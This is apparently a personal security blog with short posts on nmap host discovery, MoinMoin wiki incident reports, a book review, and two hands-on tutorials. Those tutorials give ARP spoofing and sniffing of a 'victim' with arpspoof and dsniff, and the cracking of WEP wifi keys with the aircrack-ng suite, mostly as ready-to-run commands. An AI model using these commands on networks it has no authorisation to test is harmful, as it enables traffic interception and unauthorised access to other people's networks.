Network map/Host Discovery

Network mapping for discover hosts and topology in a LAN. Is the previous step for tapping in the web or attack a host.

There are many tools fot this. I remember two good tools in my times, Iris, Retina, not free and I don’t know how are good now. But with NMAP you can do this.

For view the hosts in company lan:
nmap -sL 10.0.0.0/8
Too much hosts, I try the next command for less hosts. This limits to the subhost 10.15.255.255(1+2+4+8) :
nmap -sL 10.0.0.0/12
Or in a personal LAN we could do:
nmap -sL 192.168.1.0/24

More options for host detection explained in nmap.org:
http://nmap.org/book/man-host-discovery.html

References:

El caso: ataques a Wiki

Comparto enlace al resumen del ataque de la Wiki de Python, aprovechando una vulneravilidad de MoinMoinWiki. Muy interesante como explican todo el suceso.

http://wiki.python.org/moin/WikiAttack2013

Vulnerabilidad que ya fue aprovechada para crackear DebianWiki. Aqui el resumen e informe que hicieron.

http://wiki.debian.org/DebianWiki/SecurityIncident2012

…si es que hay que andar con 1000 ojos!

Tutorial ARPSpoofing con Dsniff

Primero hacemos que nuestro pc redireccione el trafico, para que la victima no se quede sin internet

sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"

Y luego hacemos el arpSoofing

#arpspoof -t [gateway IP] [Victim IP] & >/dev/null

#arpspoof -t [victim IP] [gateway IP] & >/dev/null

Y al final vemos el trafico, con wireshark o con…

#dsniff eth0 [eth# is depend your setting, because your sniffing your own box.]

 

Fuentes:

http://www.irongeek.com/i.php?page=security/arpspoof

http://whiskeycola.wordpress.com/2008/05/10/arpspoof-and-dsniff-teach-a-basic-sniffing/

Ataque básico WEP

Aunque ya casi esta anticuado este tipo de ataque, siguen quedando Wifis con seguridad WEP. Los pasos para conseguir el password de este tipos de puntos de accesos son:

#Ponemos tarjeta en modo promiscuo
$ sudo airmon-ng start wlan0

#Cambiamos MAC de nuestra tarjeta 
$ sudo ifconfig mon0 down
$ sudo macchanger -m 00:11:22:33:44:55 mon0
$ sudo ifconfig mon0 up

#Escaneamos las redes que están a nuestro alcance
$ sudo airodump-ng mon0

#Volcamos el tráfico de red
$ sudo airodump-ng -c [CH] -w [ESSID] --bssid [BSSID] mon0

#Inyectamos tráficos para capturar mas paquetes
$ sudo aireplay-ng -1 6000 -a [BSSID] -h 00:11:22:33:44:55 mon0
$ sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [BSSID] -h 00:11:22:33:44:55 mon0

#Ponemos a descifrar la clave con los paquetes capturados
$ sudo aircrack-ng -z [ESSID]*.cap

La información de esta entrada a sido extraida del blog:
http://elblogdepicodev.blogspot.com.es/2012/05/obtener-la-clave-de-una-red-wifi-wep.html
via
http://planeta.archlinux-es.org/
via
https://planet.archlinux.org/

Linux Máxima seguridad

Buenas a todos,

Esta entrada la voy a dedicar al famoso libro Linux Máxima Seguridad de anónimo.

Desde que cayó este libro en mis manos mis conocimientos en seguridad Linux han aumentado considerablemente. Explicando los temas de manera sencilla, pero incluyendo la base de todo lo que explica para comprenderlo bien, y con ejemplos de código y aplicaciones que llevan a cabo el tema que se está tratando en el capitulo, hasta casos reales que han explotado los agujeros de seguridad de que se están hablando.

No se si se ha ido actualizando el libro, pero la versión que tengo hay algunos programas desactulizados. Por lo que he tenido que ir buscando el equivalente actual para la distribución Arch Linux. Estos son:

Defensa:

  • AIDE: aide is an intrusion detection system for checking the integrity of files (en vez de TripWire)
  • SNORT
  • iptables

Ataque:

  • NMAP
  • WIRESHARK(Ether)
  • MACCHANGER
  • NESSUS

Criptografia:

  • John the Ripper (en vez de Crack, a sensible password checker for Unix) EXAMPLES

Adjunto enlace a ZIP con el libro tal como me lo baje en su día.

Download/Descargar

Listado de programas actuales para seguridad en http://sectools.org/